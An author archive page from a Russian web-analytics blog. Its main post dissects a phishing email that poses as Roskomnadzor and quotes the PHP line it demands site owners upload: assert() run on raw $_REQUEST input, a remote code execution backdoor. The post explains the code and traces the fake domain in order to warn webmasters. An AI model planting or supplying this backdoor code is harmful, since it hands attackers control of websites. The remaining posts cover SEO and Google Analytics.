Архив автора: Павел Волков

Об авторе Павел Волков

Профессионал в области повышения конверсии и веб-аналитики. Сертифицированный специалист Google Analytics (GA Individual Qualification).

Мошенники под видом Роскомнадзора

Сегодня на электронный ящик одного совместного проекта получил письмо якобы от Роскомнадзора с адресом отправителя zapret-info@roskomnadzor.org. С непреодолимым чувством любопытства и удивления открыл ноутбук, чтобы внимательно прочесть письмо и понять, чем же проект стал интересен регулятору.

Ведь все это происходит под шум громких заголовков о блокировке таких сайтов как Википедия. Как оказалось Роскомнадзор здесь не причем.

Вот содержание этого письма.

>>>
от: Роскомнадзор <zapret-info@roskomnadzor.org>
ответить: zapret-info@roskomnadzor.org
Кому: mailbox@example.com
дата: 27 августа 2015 г., 7:21
тема: Уведомление о внесении сайта example.ru в реестр организаторов распространения информации в сети «Интернет»
отправлено через: sendgrid.net
подписан: sendgrid.me

Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени example.ru в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ «О внесении изменений в Федеральный закон «Об информации, информационных технологиях и о защите информации» и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайт example.ru был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени example.ru, Вам необходимо:

  1. Cоздать в корневой директории Вашего сайта папку reestr
  2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:

< ?php

/*Подтверждение доменного имени example.ru*/

assert(stripslashes($_REQUEST[roskomnadzor]));

?>

*В < ?php необходимо убрать пробел между < и ?php

Путь до файла на Вашем сайте должен получиться следующий: example.ru/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени example.ru, следую инструкции указанной выше, то Ваш сайт example.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

——————-

С уважением,

ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.
<<<

В общем-то, к таким письмам следует относится внимательно. Перво наперво, что это за код PHP, который требуют разместить, а-то заблокируют. Любому сведущему в программировании понятно, что этого однозначно делать нельзя. Что же происходит при исполнении данного кода? Разберемся.

$_REQUEST — массив в PHP содержащий в себе массивы $_GET, $_POST и $_COOKIE. Т.е. неотфильтрованные данные извне. Далее вызывается функция stripslashes, которая удаляет экранирование кода, на случай, если массив $_REQUEST все же экранировался. В конце концов все, что передано в массив $_REQUEST (это может быть любой код PHP), отправляется в функцию assert(), которая работает идентично eval(), т. е. код исполняется.

Такие письма сразу отправляем в спам, но пойдем и разберемся дальше.

Вторым делом, посмотрим внимательнее на адрес отправителя. Что мы видим @roskomnadzor.org. Как минимум странно, что у гос. органа почтовый домен в зоне ORG. Проверим реальный домен Роскомнадзора, и действительно, это совершенно другой адрес — rkn.gov.ru. И отправлено письмо, через один из сервисов email-рассылок.

Перейдем на сам домен roskomnadzor.org и увидим переадресацию на реальный сайт rkn.gov.ru. Переадресация происходит с кодом 302 Moved Temporarily (временно перемещен). Отправители письма продумали и потрудились представить домен как один из доменов Роскомнадзора. Смущает лишь переадресация с кодом 302 вместо 301 как это делается для синонимов или зеркал сайтов.

Заглянем в WHOIS домена roskomnadzor.org (см. результат запроса ниже). Результат говорит сам за себя, приведу лишь самые интересные строки.

Domain Name:ROSKOMNADZOR.ORG
Domain ID: D177149039-LROR
Creation Date: 2015-08-19T23:12:27Z
Updated Date: 2015-08-19T23:41:38Z
Registry Expiry Date: 2016-08-19T23:12:27Z
Sponsoring Registrar:TLD Registrar Solutions Ltd. (R2011-LROR)
Sponsoring Registrar IANA ID: 1564
Registrant ID:INTE12jyrqple3k6
Registrant Name:Domain Admin
Registrant Organization:Whois Privacy Corp.
Registrant Street: Ocean Centre, Montagu Foreshore
Registrant Street: East Bay Street
Registrant City:Nassau
Registrant State/Province:New Providence
Registrant Postal Code:0000
Registrant Country:BS
Registrant Phone:+44.7546458118
Registrant Email:roskomnadzor.org-owner@customers.whoisprivacycorp.com
Name Server:NS-CANADA.TOPDNS.COM
Name Server:NS-USA.TOPDNS.COM
Name Server:NS-UK.TOPDNS.COM

Мы имеем дело с мошенниками, которые хотят под видом Роскомнадзора получить доступ к сайту в расчете на недальновидность и неосмотрительность веб-мастера.

Проверим, где располагается сервер обслуживающий домен. Для этого посмотрим в базу IP адресов Ru-Center. Нам сообщают, что IP-адрес 46.166.189.98 из Нидерландов, что подтверждается несколькими иностранными сервисами (используем именно иностранные, т.к. российские зачастую пользуются одним и тем же сервисом от Ru-Centeripgeobase.ru). Провайдер Nforce Entertainment B.v. в городе Roosendaal.

Дальше смотреть нет смыла и, естественно, необходимо уведомить гос. орган и коллег по цеху о такой рассылке.

В качестве заключения, хотелось бы пожелать вам, не попадаться на уловки мошенников. Будьте бдительны.

Ключевое слово (not provided). SEO и Google Analytics

Поисковая строка GoogleТак получилось, что в последнее время много рабочего времени уделяю поисковому продвижению сайта (SEO). Google Analytics в поисковом продвижении играет не последнюю роль. Для эффективного продвижения, важно понимать по каким ключевикам попадают клиенты на сайт, и какое из слов приносит наибольший доход.

Информация о ключевых словах из органического писка доступна в готовом отчете GA в разделе Источники трафика (Traffic Sources) > Источники (Sources) > Поиск (Search) > Бесплатный (Organic). Среди ключевых слов встречается и такое как (not provided). Что это и как такое возможно? Давайте разбираться.

18 октября 2011 года Google объявил о переводе всего поиска на использование протокола SSL для пользователей, которые залогинились в свои аккаунты на Google. Как следствие, их перенаправляют на https://google.com и весь трафик, включая поисковый запрос, вводимый пользователем, шифруется и становится недоступным для системы веб-аналитики Google Analytics, Omniture и других.

Еще один момент, который оказывает влияние на количества (not provided) запросов рост популярности браузера Chrome. В этом браузере замечательный омнибокс, позволяющий искать прямо из адресной строки, но и он работает через HTTPS. В 2012 году разработчики Firefox и Safari объявили о переходе к использованию https в поиске Google. В перечисленных браузерах это справедливо даже, когда пользователь не залогинился в аккаунт Google.

Сайты, в которых Google занимает значимую долю трафика, обязательно увидят (not provided) в ТОП 10 поисковых запрос в своих отчетах. Отсутствие информации о запросе не позволяет корректно посчитать ROI от оптимизации под конкретный ключевик и заставляет нас искать пути решения данной проблемы.

Как извлечь поисковый запрос из (not provided)

На самом деле с (not provided) ничего не сделаешь, как бы мы не искали, запросы в GA сохраняться не будут. Но это справедливо только для бесплатного/органического поиска, так как в отличие от него платный (AdWords) отображает поисковые запросы даже для зашифрованного трафика.

Что же все-таки мы можем предпринять, чтобы заглянуть внутрь (not provided)?

1. Используем расширенный сегмент

Настройка расширенного сегмента Google Analytics

Настройка расширенного сегмента Google Analytics для анализа посадочных страниц (not provided).

Создав расширенный сегмент GA включающий трафик с запросом (not provided) мы легко получим перечень посадочных страниц, которые смогут нам рассказать о характере запроса посетителя.

Например, сайт автосервиса по запросу (not provided) посетили 30 000 человек. Из них 17 589 вошли через главную страницу или «/». Это может означать, что 59% клиентов попали на сайт по брэндированному запросу, т. е. содержащему название компании.

2. Анализируем отчет Поисковой оптимизации

В Google Analytics существует стандартный отчет Источники трафика (Traffic Sources) > Поисковая оптимизация (Search Engine Optimization) > Запросы (Queries). Информация в этом отчете обновляется позже на 2 дня чем вся остальная.

Данные предоставляемые отчетом весьма ограничены и полагаться на него для крупного сайта будет неправильно. Тем не менее, анализ данного отчета для сайта со средней и низкой посещаемостью будет весьма полезен для отслеживания общей картины по бесплатному поисковому трафику.

3. Воспользуемся отчетом Google Webmaster

Скриншот отчета по запросам Google Webmasters

Скриншот отчета по запросам Google Webmasters

В панели веб-мастера от Google также есть отчет по поисковым запросам, данные из которого копируются в GA. В отличие от стандартного отчета здесь наглядно рассчитан CTR и отображается средняя позиция в выдаче по каждому ключевику.

Все три предложенных решения всего лишь обходные пути и не избавят нас от (not provided). Перечень не исчерпывающий и содержит наиболее очевидные решения.

С удовольствием обсужу с вами прочие подходы к анализу (not provided) в комментариях.

«Давай, до свиданья» или страница, которую недооценивают

Многие обладатели сайтов пользуются системами веб-аналитики. Мы все отслеживаем посещаемость разделов сайта и отдельно взятых страниц. Часто самые посещаемые страницы это главная, продуктовая и страница авторизации или входа в аккаунт. Но среди самых посещаемых страниц есть одна, которую часто даже не замечают. А ведь она по посещаемости не уступает странице авторизации — это страница выхода (до свиданья, logout, спасибо, называть ее можно по-разному). Читать далее

Повышение качества трафика с рекламной площадки

В 2010 году мы задумались, как повысить качество трафика, приходящего с одной из наших рекламных площадок по автокредитам. Трафик с drom.ru колебался с 3 до 20 тысяч посещений в месяц, в зависимости от сроков размещения и рекламного предложения. Первое, что смущало, это объем трафика, привлекаемого рекламой. Если рекламная кампания привлекает трафик до 20 тысяч в месяц, с учетом того, что сайт федерального уровня с миллионной посещаемостью, получается неудовлетворительный результат. Качество трафика также вызывало сомнения. На конец 2010 года заявок на автокредиты было немного, цена заявки и выдачи зашкаливала. Отказываться от площадки глупо, продолжать размещение в текущем режиме неразумно. Читать далее